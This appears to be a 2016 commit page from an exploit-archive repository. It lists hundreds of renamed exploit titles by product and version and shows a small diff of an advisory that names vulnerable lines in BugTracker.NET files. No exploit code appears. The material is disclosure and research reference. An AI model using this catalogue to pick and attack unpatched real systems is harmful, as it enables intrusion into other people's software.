FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow Sitecom WLM-2501 new - Multiple Cross-Site Request Forgery Vulnerabilities Sitecom WLM-2501 - Multiple Cross-Site Request Forgery Vulnerabilities Ricoh DC DL-10 SR10 - FTP USER Command Buffer Overflow (Metasploit) Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit) TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam - ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow Quest InTrust Annotation Objects - Uninitialized Pointer (Metasploit) Quest InTrust - Annotation Objects Uninitialized Pointer (Metasploit) TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow (Metasploit) TFTP Server 1.4 (Windows) - ST WRQ Buffer Overflow (Metasploit) samsung net-i ware 1.37 - Multiple Vulnerabilities Samsung NET-i ware 1.37 - Multiple Vulnerabilities iOS 5.1.1 - Safari Browser - JS match() & search() Crash (PoC) Apple iOS 5.1.1 - Safari Browser - JS match() & search() Crash (PoC) GIMP - script-fu Server Buffer Overflow (Metasploit) GIMP script-fu - Server Buffer Overflow (Metasploit) SugarCRM 6.3.1 - Unserialize() PHP Code Execution (Metasploit) SugarCRM CE 6.3.1 - Unserialize() PHP Code Execution (Metasploit) Openfire 3.6.0a - Admin Console Authentication Bypass (Metasploit) Openfire Server 3.6.0a - Admin Console Authentication Bypass (Metasploit) Tiki Wiki 8.3 - Unserialize() PHP Code Execution (Metasploit) Tiki Wiki CMS Groupware 8.3 - Unserialize() PHP Code Execution (Metasploit) Ipswitch IMail 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 - Weak Password Encryption Ipswitch IMail Server 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 - Weak Password Encryption UoW imapd 10.234/12.264 - Buffer Overflow UoW imapd 10.234/12.264 - LSUB Buffer Overflow (Metasploit) UoW imapd 10.234/12.264 - COPY Buffer Overflow (Metasploit) UoW IMAPd Server 10.234/12.264 - Buffer Overflow UoW IMAPd Server 10.234/12.264 - LSUB Buffer Overflow (Metasploit) UoW IMAPd Serve 10.234/12.264 - COPY Buffer Overflow (Metasploit) RedHat 6.2 - Piranha Virtual Server Package Default Account and Password RedHat 6.2 Piranha Virtual Server Package - Default Account and Password Microsoft Windows - Escalate Task Scheduler XML Privilege Escalation (Metasploit) Microsoft Windows - Task Scheduler XML Privilege Escalation (Metasploit) hp jetadmin 5.5.177/jetadmin 5.6 - Directory Traversal HP JetAdmin 5.5.177/jetadmin 5.6 - Directory Traversal Alienvault OSSIM 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection Alienvault OSSIM Open Source SIEM 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection RedHat 6 - glibc/locale Subsystem Format String Solaris 2.6/7.0 - /locale Subsystem Format String RedHat 6 GLIBC/locale - Subsystem Format String Solaris 2.6/7.0 /locale - Subsystem Format String Solaris 2.6/7.0 - 'eject' locale Subsystem Format String Solaris 2.6/7.0 'eject' locale - Subsystem Format String Microsoft IIS 4.0/5.0 and PWS Extended Unicode - Directory Traversal (5) Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (5) RedHat restore 0.4 b15 - Insecure Environment Variables RedHat 0.4 b15 restore - Insecure Environment Variables Viscosity OpenVPN Client (OSX) - Privilege Escalation Viscosity - Privilege Escalation Solaris 2.x/7.0/8 catman - Race Condition (1) Solaris 2.x/7.0/8 catman - Race Condition (2) Solaris 2.x/7.0/8 Catman - Race Condition (1) Solaris 2.x/7.0/8 Catman - Race Condition (2) sap NetWeaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities SAP NetWeaver Dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities T-dah Webmail - Multiple Persistent Cross-Site Scripting T-dah Webmail Client - Multiple Persistent Cross-Site Scripting Ntpd - Remote Buffer Overflow NTPd - Remote Buffer Overflow Ipswitch WS_FTP 2.0 - Anonymous Multiple FTP Command Buffer Overflow Ipswitch WS_FTP Server 2.0 - Anonymous Multiple FTP Command Buffer Overflow Solaris 2.x/7.0/8 lpd - Remote Command Execution HP-UX 11.0 SWVerify - Buffer Overflow Solaris 2.x/7.0/8 LPD - Remote Command Execution HP-UX 11.0 - SWVerify Buffer Overflow phusion WebServer 1.0 - Directory Traversal (1) phusion WebServer 1.0 - Directory Traversal (2) Phusion WebServer 1.0 - Directory Traversal (1) Phusion WebServer 1.0 - Directory Traversal (2) Progress 9.1 - sqlcpp Local Buffer Overflow Progress Database 9.1 - sqlcpp Local Buffer Overflow PsyBNC 2.3 - Oversized Passwords Denial of Service psyBNC 2.3 - Oversized Passwords Denial of Service Wu-imapd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (1) Wu-imapd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (2) WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (1) WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (2) Midicart - PHP Arbitrary File Upload Midicart PHP - Arbitrary File Upload otrs 3.1 - Persistent Cross-Site Scripting OTRS 3.1 - Persistent Cross-Site Scripting EType EServ 2.9x POP3 - Remote Denial of Service EType EServ 2.9x - POP3 Remote Denial of Service Invision Power Board 3.3.4 - 'Unserialize()' PHP Code Execution Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution Invision Power Board 3.3.4 - Unserialize Regex Bypass Invision Power Board (IP.Board) 3.3.4 - Unserialize Regex Bypass ttCMS 2.2 - / ttForum 1.1 news.php template Parameter Remote File Inclusion ttCMS 2.2 - / ttForum 1.1 install.php installdir Parameter Remote File Inclusion ttCMS 2.2 / ttForum 1.1 - news.php template Parameter Remote File Inclusion ttCMS 2.2 / ttForum 1.1 - install.php installdir Parameter Remote File Inclusion Invision IP.Board 3.3.4 - Unserialize() PHP Code Execution (Metasploit) Invision Power Board (IP.Board) 3.3.4 - Unserialize() PHP Code Execution (Metasploit) NFR Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution (Metasploit) Novell File Reporter (NFR) Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution (Metasploit) Kerio MailServer 5.6.3 - add_acl Module Overflow Kerio MailServer 5.6.3 add_acl Module - Overflow phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 - pagemaster Module PAGE_id Parameter Cross-Site Scripting phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module - PAGE_id Parameter Cross-Site Scripting IBM System Director - Remote System Level Exploit IBM System Director Agent - Remote System Level Exploit Tectia SSH - USERAUTH Change Request Password Reset (Metasploit) (SSH.com Communications) SSH Tectia - USERAUTH Change Request Password Reset (Metasploit) Oracle MySQL for Microsoft Windows - MOF Execution (Metasploit) Oracle MySQL (Windows) - MOF Execution (Metasploit) CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (1) CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (2) GNU CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (1) GNU CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (2) IWConfig - Local ARGV Command Line Buffer Overflow (1) IWConfig - Local ARGV Command Line Buffer Overflow (2) IWConfig - Local ARGV Command Line Buffer Overflow (3) Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (1) Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (2) Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (3) Novell File Reporter Agent - XML Parsing Remote Code Execution Novell File Reporter (NFR) Agent - XML Parsing Remote Code Execution RhinoSoft Serv-U FTP Server 3/4 - MDTM Command Stack Overflow (1) RhinoSoft Serv-U FTP Server 3/4 - MDTM Command Stack Overflow (2) RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (1) RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (2) RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1) RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2) RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3) RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (4) RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1) RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2) RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3) RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (4) Alan Ward A-Cart 2.0 - category.asp catcode Parameter SQL Injection Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection Nagios - history.cgi Remote Command Execution Nagios3 - history.cgi Remote Command Execution phpshop 2.0 - SQL Injection phpShop 2.0 - SQL Injection Freesshd - Authentication Bypass (Metasploit) FreeSSHD - Authentication Bypass (Metasploit) RiSearch 0.99 - /RiSearch Pro 3.2.6 show.pl Open Proxy Relay RiSearch 0.99 - /RiSearch Pro 3.2.6 show.pl Arbitrary File Access RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Open Proxy Relay RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Arbitrary File Access SLMail 5.5 - POP3 PASS Remote Buffer Overflow SLMail 5.5 - Remote Buffer Overflow Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Remote Buffer Overflow Seattle Lab Mail (SLMail) 5.5 - Remote Buffer Overflow AT-TFTP Server 2.0 - Stack Based Buffer Overflow Denial of Service Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Based Buffer Overflow Denial of Service Microsoft Windows Light HTTPD 0.1 - Buffer Overflow Light HTTPD 0.1 (Windows) - Buffer Overflow MSN Messenger 6.2.0137 - '.png' Buffer Overflow Microsoft MSN Messenger 6.2.0137 - '.png' Buffer Overflow Smail-3 - Multiple Remote and Local Vulnerabilities Smail 3 - Multiple Remote and Local Vulnerabilities Cisco Linksys E4200 Firmware - Multiple Vulnerabilities Cisco Linksys E4200 - Multiple Vulnerabilities Salim Gasmi GLD 1.x - Postfix Greylisting Daemon Buffer Overflow Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow Claroline 1.5/1.6 - userInfo.php Multiple Parameter SQL Injection Claroline 1.5/1.6 - exercises_details.php exo_id Parameter SQL Injection Claroline E-Learning 1.5/1.6 - userInfo.php Multiple Parameter SQL Injection Claroline E-Learning 1.5/1.6 - exercises_details.php exo_id Parameter SQL Injection PHPCOIN 1.2 - 'login.php' PHPcoinsessid Parameter SQL Injection phpCOIN 1.2 - 'login.php' PHPcoinsessid Parameter SQL Injection NPDS 4.8 - /5.0 admin.php language Parameter Cross-Site Scripting NPDS 4.8 - /5.0 powerpack_f.php language Parameter Cross-Site Scripting NPDS 4.8 - /5.0 sdv_infos.php sitename Parameter Cross-Site Scripting NPDS 4.8 < 5.0 - admin.php language Parameter Cross-Site Scripting NPDS 4.8 < 5.0 - powerpack_f.php language Parameter Cross-Site Scripting NPDS 4.8 < 5.0 - sdv_infos.php sitename Parameter Cross-Site Scripting NPDS 4.8 - /5.0 reviews.php title Parameter Cross-Site Scripting NPDS 4.8 - /5.0 reply.php image_subject Parameter Cross-Site Scripting NPDS 4.8 - /5.0 Glossaire Module terme Parameter SQL Injection NPDS 4.8 - /5.0 links.php Query Parameter SQL Injection NPDS 4.8 - /5.0 faq.php categories Parameter Cross-Site Scripting NPDS 4.8 < 5.0 - reviews.php title Parameter Cross-Site Scripting NPDS 4.8 < 5.0 - reply.php image_subject Parameter Cross-Site Scripting NPDS 4.8 < 5.0 - Glossaire Module terme Parameter SQL Injection NPDS 4.8 < 5.0 - links.php Query Parameter SQL Injection NPDS 4.8 < 5.0 - faq.php categories Parameter Cross-Site Scripting SlimServe httpd 1.0/1.1 - Directory Traversal WhitSoft SlimServe httpd 1.0/1.1 - Directory Traversal Quick TFTP Server 2.2 - Denial of Service Quick TFTP Server Pro 2.2 - Denial of Service aeNovo - /incs/searchdisplay.asp strSQL Parameter SQL Injection Aenovo - /incs/searchdisplay.asp strSQL Parameter SQL Injection XMB 1.9.3 - u2u.php Cross-Site Scripting XMB Forum 1.9.3 - u2u.php Cross-Site Scripting PHPAlbum 0.2.3/4.1 - Local File Inclusion PHP Photo Album 0.2.3/4.1 - Local File Inclusion Zoom X4/X5 ADSL Modem - Multiple Vulnerabilities Zoom Telephonics X4/X5 ADSL Modem - Multiple Vulnerabilities BlazeDVD Pro player 6.1 - Stack Based Buffer Overflow (Direct Ret) BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct Ret) NetBSD mail.local - Privilege Escalation (Metasploit) NetBSD mail.local(8) - Privilege Escalation (Metasploit) PCMAN FTP 2.07 - PASS Command Buffer Overflow PCMan FTP Server 2.07 - PASS Command Buffer Overflow PCMAN FTP 2.07 - STOR Command Buffer Overflow PCMan FTP Server 2.07 - STOR Command Buffer Overflow EImagePro - - subList.asp CatID Parameter SQL Injection EImagePro - subList.asp CatID Parameter SQL Injection OZJournals 1.2 - Vname Parameter Cross-Site Scripting OZJournals 1.2 - 'Vname' Parameter Cross-Site Scripting SoftBiz Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection SoftBiz Dating Script 1.0 - products.php cid Parameter SQL Injection SoftBiz Dating Script 1.0 - 'index.php' cid Parameter SQL Injection SoftBiz Dating Script 1.0 - news_desc.php id Parameter SQL Injection SoftBizScripts Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection SoftBizScripts Dating Script 1.0 - products.php cid Parameter SQL Injection SoftBizScripts Dating Script 1.0 - 'index.php' cid Parameter SQL Injection SoftBizScripts Dating Script 1.0 - news_desc.php id Parameter SQL Injection OZJournals 1.5 - Multiple Input Validation Vulnerabilities Baby FTP server 1.24 - Denial of Service PCMAN FTP 2.07 - STOR Command Stack Overflow (Metasploit) PCMan FTP Server 2.07 - STOR Command Stack Overflow (Metasploit) Sophos Web Protection Appliance sblistpack - Arbitrary Command Execution (Metasploit) Sophos Web Protection Appliance - 'sblistpack' Arbitrary Command Execution (Metasploit) Festalon 0.5 - '.HES' Files Remote Heap Buffer Overflow Festalon 0.5 - '.HES' Remote Heap Buffer Overflow EZContents 2.0. - gallery_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion EZContents 2.0 - gallery_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion Google Earth 4.0.2091 (Beta) - KML/KMZ Files Buffer Overflow Google Earth 4.0.2091 (Beta) - '.KML'/'.KMZ' Buffer Overflow A-CART 2.0 - category.asp catcode Parameter SQL Injection Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection Microsoft Windows Media 6.4/10.0 - MID Malformed Header Chunk Denial of Service Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service Microsoft Windows NDPROXY - Local SYSTEM Privilege Escalation (MS14-002) Microsoft Windows - 'NDPROXY' Local SYSTEM Privilege Escalation (MS14-002) Fish - Multiple Remote Buffer Overflow Vulnerabilities FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities Microsoft Windows XP/2000 - 'WinMM.dll' .WAV Files Remote Denial of Service Microsoft Windows XP/2000 - 'WinMM.dll' / '.WAV' Remote Denial of Service Comersus Cart 7.0.7 Cart - comersus_message.asp redirectUrl Cross-Site Scripting Comersus Cart 7.0.7 - comersus_message.asp redirectUrl Cross-Site Scripting LanDesk Management Suite 8.7 Alert Service - AOLSRVR.exe Buffer Overflow LANDesk Management Suite 8.7 Alert Service - AOLSRVR.exe Buffer Overflow SAP DB 7.x - Web Server WAHTTP.exe Multiple Buffer Overflow Vulnerabilities SAP DB 7.x Web Server - WAHTTP.exe Multiple Buffer Overflow Vulnerabilities Lanius CMS 1.2.14 - FAQ Module mid Parameter SQL Injection Lanius CMS 1.2.14 - EZSHOPINGCART Module cid Parameter SQL Injection Lanius CMS 1.2.14 FAQ Module - 'mid' Parameter SQL Injection Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' Parameter SQL Injection Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal SafeNet Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal Thomson SpeedTouch 2030 - SIP Invite Message Remote Denial of Service Thomson SpeedTouch ST 2030 (SIP Phone) - SIP Invite Message Remote Denial of Service Uebimiau 2.7.x - 'index.php' Cross-Site Scripting Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting Seagate BlackArmor - Root Exploit Seagate BlackArmor NAS - Root Exploit Safari 1.x/3.0.x / Firefox 1.5.0.x/2.0.x - JavaScript Multiple Fields Key Filtering Apple Safari 1.x/3.0.x / Firefox 1.5.0.x/2.0.x - JavaScript Multiple Fields Key Filtering PCMAN FTP 2.07 - ABOR Command Buffer Overflow PCMAN FTP 2.07 - CWD Command Buffer Overflow PCMan FTP Server 2.07 - ABOR Command Buffer Overflow PCMan FTP Server 2.07 - CWD Command Buffer Overflow HP OpenView Network Node Manager 7.x - (OV NNM) OpenView5.exe Action Parameter Traversal Arbitrary File Access HP OpenView Network Node Manager (OV NNM) 7.x -OpenView5.exe Action Parameter Traversal Arbitrary File Access amfphp 1.2 - browser/details class Parameter Cross-Site Scripting amfPHP 1.2 - browser/details class Parameter Cross-Site Scripting PCMAN FTP 2.07 - Buffer Overflow PCMan FTP Server 2.07 - Buffer Overflow Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit Ultra Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit SAFARI Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities Apple Safari Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities Novell Groupwise Messenger 2.0 - Client Buffer Overflow Novell Groupwise Messenger 2.0 Client - Buffer Overflow Meeting Room Booking System - (MRBS) 1.2.6 day.php area Parameter Cross-Site Scripting Meeting Room Booking System - (MRBS) 1.2.6 week.php area Parameter Cross-Site Scripting Meeting Room Booking System - (MRBS) 1.2.6 month.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - day.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - week.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - month.php area Parameter Cross-Site Scripting Meeting Room Booking System - (MRBS) 1.2.6 report.php area Parameter Cross-Site Scripting Meeting Room Booking System - (MRBS) 1.2.6 help.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - report.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - help.php area Parameter Cross-Site Scripting Oracle VirtualBox 3D Acceleration - Multiple Vulnerabilities Oracle VM VirtualBox 3D Acceleration - Multiple Vulnerabilities OpenNms 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting OpenNms 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting OpenNms 1.5.x - event/list filter Parameter Cross-Site Scripting OpenNMS 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting OpenNMS 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting OpenNMS 1.5.x - event/list filter Parameter Cross-Site Scripting OpenNms 1.5.x - HTTP Response Splitting OpenNMS 1.5.x - HTTP Response Splitting Lynx 2.8 - '.mailcap' and '.mime.type' Files Local Code Execution Lynx 2.8 - '.mailcap'/'.mime.type' Local Code Execution Zeeways SHAADICLONE 2.0 - 'admin/home.php' Authentication Bypass Zeeways Shaadi Clone 2.0 - 'admin/home.php' Authentication Bypass Pilot Group PG Roommate - SQL Injection Pilot Group PG Roommate Finder Solution - SQL Injection OpenSSL TLS Heartbeat Extension - Memory Disclosure OpenSSL TLS Heartbeat Extension - ''Heartbleed' Memory Disclosure OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions) OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS versions) Heartbleed OpenSSL - Information Leak Exploit (1) OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak Exploit (1) IBM Director 5.20 - CIM Server Privilege Escalation IBM System Director Agent 5.20 - CIM Server Privilege Escalation Heartbleed OpenSSL - Information Leak Exploit (2) DTLS Support OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak Exploit (2) (DTLS Support) Kolibri 2.0 - GET Request Stack Buffer Overflow Kolibri Web Server 2.0 - GET Request Stack Buffer Overflow Easy Chat Server 3.1 - Stack Buffer Overflow EFS Easy Chat Server 3.1 - Stack Buffer Overflow Sphider 1.3.6 - Multiple Vulnerabilities Sphider Search Engine 1.3.6 - Multiple Vulnerabilities Kolibri WebServer 2.0 - GET Request SEH Exploit Kolibri Web Server 2.0 - GET Request SEH Exploit MQAC.sys - Arbitrary Write Privilege Escalation (Metasploit) Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit) VirtualBox - 3D Acceleration Virtual Machine Escape (Metasploit) VirtualBox Guest Additions - 'VBoxGuest.sys' Privilege Escalation (Metasploit) Oracle VM VirtualBox 4.3.6 - 3D Acceleration Virtual Machine Escape (Metasploit) Oracle VM VirtualBox Guest Additions 4.3.10r93012 - 'VBoxGuest.sys' Privilege Escalation (Metasploit) Impact Software Ad Peeps - Cross-Site Scripting / HTML Injection Impact Software AdPeeps - Cross-Site Scripting / HTML Injection PPScript - 'shop.htm' SQL Injection Payment Processor Script (PPScript) - 'shop.htm' SQL Injection ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution Microsoft Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060) Microsoft Windows - OLE Remote Code Execution 'Sandworm' Exploit (MS14-060) Eclipse 3.3.2 IDE Help Server - help/advanced/searchView.jsp SearchWord Parameter Cross-Site Scripting Eclipse 3.3.2 IDE - Help Server help/advanced/searchView.jsp SearchWord Parameter Cross-Site Scripting TaskFreak 0.6.4 - 'index.php' Multiple Parameter Cross-Site Scripting TaskFreak 0.6.4 - print_list.php Multiple Parameter Cross-Site Scripting TaskFreak 0.6.4 - rss.php HTTP Referer Header Cross-Site Scripting TaskFreak! 0.6.4 - 'index.php' Multiple Parameter Cross-Site Scripting TaskFreak! 0.6.4 - print_list.php Multiple Parameter Cross-Site Scripting TaskFreak! 0.6.4 - rss.php HTTP Referer Header Cross-Site Scripting WordPress Plugin Wp Symposium 14.11 - Unauthenticated Arbitrary File Upload WordPress Plugin WP Symposium 14.11 - Unauthenticated Arbitrary File Upload Pandora 3.1 - Authentication Bypass / Arbitrary File Upload (Metasploit) Pandora FMS 3.1 - Authentication Bypass / Arbitrary File Upload (Metasploit) Oracle MySQL for Microsoft Windows - FILE Privilege Abuse (Metasploit) Oracle MySQL (Windows) - FILE Privilege Abuse (Metasploit) Exim ESMTP 4.80 glibc gethostbyname - Denial of Service Exim ESMTP 4.80 - glibc gethostbyname Denial of Service Support Incident Tracker - (SiT!) 3.63 p1 search.php search_string Parameter SQL Injection Support Incident Tracker (SiT!) 3.63 p1 - search.php search_string Parameter SQL Injection alitbang CMS 3.3 - alumni.php hal Parameter SQL Injection Balitbang CMS 3.3 - alumni.php hal Parameter SQL Injection HP Network Node Manager i 9.10 - nnm/mibdiscover node Parameter Cross-Site Scripting HP Network Node Manager i 9.10 - nnm/protected/configurationpoll.jsp nodename Parameter Cross-Site Scripting HP Network Node Manager i 9.10 - nnm/protected/ping.jsp nodename Parameter Cross-Site Scripting HP Network Node Manager i 9.10 - nnm/protected/statuspoll.jsp nodename Parameter Cross-Site Scripting HP Network Node Manager i 9.10 - nnm/protected/traceroute.jsp nodename Parameter Cross-Site Scripting HP Network Node Manager (NMM) i 9.10 - nnm/mibdiscover node Parameter Cross-Site Scripting HP Network Node Manager (NMM) i 9.10 - nnm/protected/configurationpoll.jsp nodename Parameter Cross-Site Scripting HP Network Node Manager (NMM) i 9.10 - nnm/protected/ping.jsp nodename Parameter Cross-Site Scripting HP Network Node Manager (NMM) i 9.10 - nnm/protected/statuspoll.jsp nodename Parameter Cross-Site Scripting HP Network Node Manager (NMM) i 9.10 - nnm/protected/traceroute.jsp nodename Parameter Cross-Site Scripting Publish-It - PUI Buffer Overflow (SEH) Publish-It - '.PUI' Buffer Overflow (SEH) WordPress Plugin WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin) WordPress Plugin Marketplace 2.4.0 - Remote Code Execution (Add Admin) Yaws 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities Yaws-Wiki 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities abrt (Fedora 21) - Race Condition Abrt (Fedora 21) - Race Condition Webgate WESP SDK 1.2 - ChangePassword Stack Overflow WebGate WESP SDK 1.2 - ChangePassword Stack Overflow Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034) Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034) Oracle - Outside-In DOCX File Parsing Memory Corruption Oracle - Outside-In '.DOCX' File Parsing Memory Corruption iTunes 10.6.1.7 - '.pls' Title Buffer Overflow Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow WordPress Plugin Leaflet Maps Marker 0.0.1 for - leaflet_marker.php id Parameter Cross-Site Scripting WordPress Plugin Leaflet Maps Marker 0.0.1 - leaflet_marker.php id Parameter Cross-Site Scripting Microsoft Windows 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070) Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070) Mozilla Firefox < 39.03 - pdf.js Same Origin Policy Exploit Mozilla Firefox < 39.03 - 'pdf.js' Same Origin Policy Exploit Mozilla Firefox - pdf.js Privileged JavaScript Injection (Metasploit) Mozilla Firefox - 'pdf.js' Privileged JavaScript Injection (Metasploit) MiniUPnP - Multiple Denial of Service Vulnerabilities MiniUPnP 1.4 - Multiple Denial of Service Vulnerabilities Kaseya Virtual System Administrator - Multiple Vulnerabilities (2) Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (2) Safari - User-Assisted Applescript Exec Attack (Metasploit) Apple Safari - User-Assisted Applescript Exec Attack (Metasploit) Acrobat Reader DC 15.008.20082.15957 - PDF Parsing Memory Corruption Acrobat Reader DC 15.008.20082.15957 - '.PDF' Parsing Memory Corruption Dynamic Biz Website Builder - (QuickWeb) 1.0 apps/news-events/newdetail.asp id Parameter SQL Injection Dynamic Biz Website Builder (QuickWeb) 1.0 - apps/news-events/newdetail.asp id Parameter SQL Injection Xangati XSR And XNR - 'gui_input_test.pl' Remote Command Execution Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap Based Out-of-Bounds Read pdfium CPDF_TextObject::CalcPositionData - Heap Based Out-of-Bounds Read pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Based Out-of-Bounds Read pdfium - CPDF_TextObject::CalcPositionData Heap Based Out-of-Bounds Read pdfium CPDF_Function::Call - Stack Based Buffer Overflow pdfium - CPDF_Function::Call Stack Based Buffer Overflow Foxit Reader 7.2.8.1124 - PDF Parsing Memory Corruption Foxit Reader 7.2.8.1124 - '.PDF' Parsing Memory Corruption Netgear ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit) Netgear ProSafe Network Management System NMS300 - Arbitrary File Upload (Metasploit) Novell Service Desk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities Novell ServiceDesk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload Oracle Application Testing Suite (ATS) 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authentication Bypass ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass MiCasa VeraLite - Remote Code Execution MiCasaVerde VeraLite - Remote Code Execution SmallFTPd 1.0.3 - 'mkd' Command Denial of Service SmallFTPd 1.0.3 - 'mkd' Command Denial Of Service GNU GTypist 2.9.5-2 - Local Buffer Overflow uSQLite 1.0.0 - Denial Of Service HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation Joomla 3.4.4 - 3.6.4 - Account Creation / Privilege Escalation CherryTree 0.36.9 - Memory Corruption (PoC)
2016-10-28 05:01:21 +00:00 · 2016-10-28 05:01:21 +00:00 · da85686a94
commit da85686a94
parent 1e70058c1e
221 changed files with 9305 additions and 8976 deletions
--- a/files.csv
+++ b/files.csv
--- a/platforms/asp/webapps/15653.txt
+++ b/platforms/asp/webapps/15653.txt
@ -34,9 +34,9 @@ scripting and SQL-injection vulnerabilities were found in the following
 files of the BugTracker.NET:
   . *bugs.aspx*. SQL injection in line 141.
-   . *delete_query.aspx*. No sanitization for 'row_id.Value' in line 30.
+   . *delete_query.aspx*. No sanitization for \'row_id.Value\' in line 30.
   . *edit_bug.aspx*. Variables without sanitization in lines 1846 and 1857.
-   . *edit_bug.aspx*. No sanitization for variable 'new_project', line 2214.
+   . *edit_bug.aspx*. No sanitization for variable \'new_project\', line 2214.
   . *edit_bug.aspx*. XSS in line 2918.
   . *edit_comment.aspx*. XSS in line 233.
   . *edit_customfield.aspx*. Lines 165 and 172, no sanitization.
